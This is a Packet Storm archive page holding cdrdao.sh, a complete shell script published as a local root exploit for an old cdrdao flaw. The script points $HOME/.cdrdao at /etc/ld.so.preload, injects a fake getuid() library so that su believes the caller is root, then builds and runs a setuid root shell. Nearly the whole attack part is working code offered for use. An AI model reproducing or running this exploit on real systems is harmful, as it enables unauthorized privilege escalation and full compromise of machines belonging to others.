exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

cdrdao.sh

cdrdao.sh
Posted Sep 9, 2004

Local root exploit for an old flaw in cdrdao.

tags | exploit, local, root
SHA-256 | 7b62a07fe0891df4fc0e3014cfbdf2c8764003d4f0e5182099154c912221cc2a

cdrdao.sh

Change Mirror Download


#!/bin/sh

DIR=`pwd`

echo ""

echo "cdrdao local root exploit - gr doesn't protect you this time"

echo "Karol Wiêsek <appelast*drumnbass.art.pl>"

echo ""

sleep 2

umask 000

echo -n "[*] Checking if /etc/ld.so.preload doesn't exist ... "

if [ -f /etc/ld.so.preload ]; then

echo "WRONG"

echo "/etc/ld.so.preload exists, write another exploit ;P"

exit

else

echo "OK"

fi

echo -n "[*] Checking if su is setuid ... "

if [ -u /bin/su ];then

echo "OK"

else

echo "WRONG"

exit

fi

echo -n "[*] Creating evil *uid() library ... "

cat > getuid_lib.c << _EOF

int getuid(void) {

return 0; }

_EOF

gcc -o getuid_lib.o -c getuid_lib.c

ld -shared -o getuid_lib.so getuid_lib.o

rm -f getuid_lib.c getuid_lib.o

if [ -f ./getuid_lib.so ]; then

echo "OK"

else

echo "WRONG"

fi

echo -n "[*] Creating suidshell ... "

cat > suid.c << _EOF

int main(void) {

setgid(0); setuid(0);

unlink("./suid");

execl("/bin/sh","sh",0); }

_EOF

gcc -o suid suid.c

rm -f suid.c

if [ -x ./suid ];then

echo "OK"

else

echo "WRONG"

exit

fi

echo -n "[*] Exploiting cdrdao ... "

ln -sf /etc/ld.so.preload $HOME/.cdrdao

if [ ! -L $HOME/.cdrdao ];then

echo "Could'n link to \$HOME/.cdrdao"

exit

fi

cdrdao unlock --save 2>/dev/null

>/etc/ld.so.preload

echo "$DIR/getuid_lib.so" > /etc/ld.so.preload

su - -c "rm /etc/ld.so.preload; chown root:root $DIR/suid; chmod +s $DIR/suid"

if [ -s ./suid ];then

echo "OK"

else

echo "WRONG"

exit

fi

rm -f getuid_lib.so

unlink $HOME/.cdrdao

echo "Entering rootshell ... ;]"

./suid



Login or Register to add favorites

File Archive:

February 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    16 Files
  • 2
    Feb 2nd
    19 Files
  • 3
    Feb 3rd
    0 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    24 Files
  • 6
    Feb 6th
    2 Files
  • 7
    Feb 7th
    10 Files
  • 8
    Feb 8th
    25 Files
  • 9
    Feb 9th
    37 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    17 Files
  • 13
    Feb 13th
    20 Files
  • 14
    Feb 14th
    25 Files
  • 15
    Feb 15th
    15 Files
  • 16
    Feb 16th
    6 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    35 Files
  • 20
    Feb 20th
    25 Files
  • 21
    Feb 21st
    18 Files
  • 22
    Feb 22nd
    15 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    10 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files
  • 29
    Feb 29th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close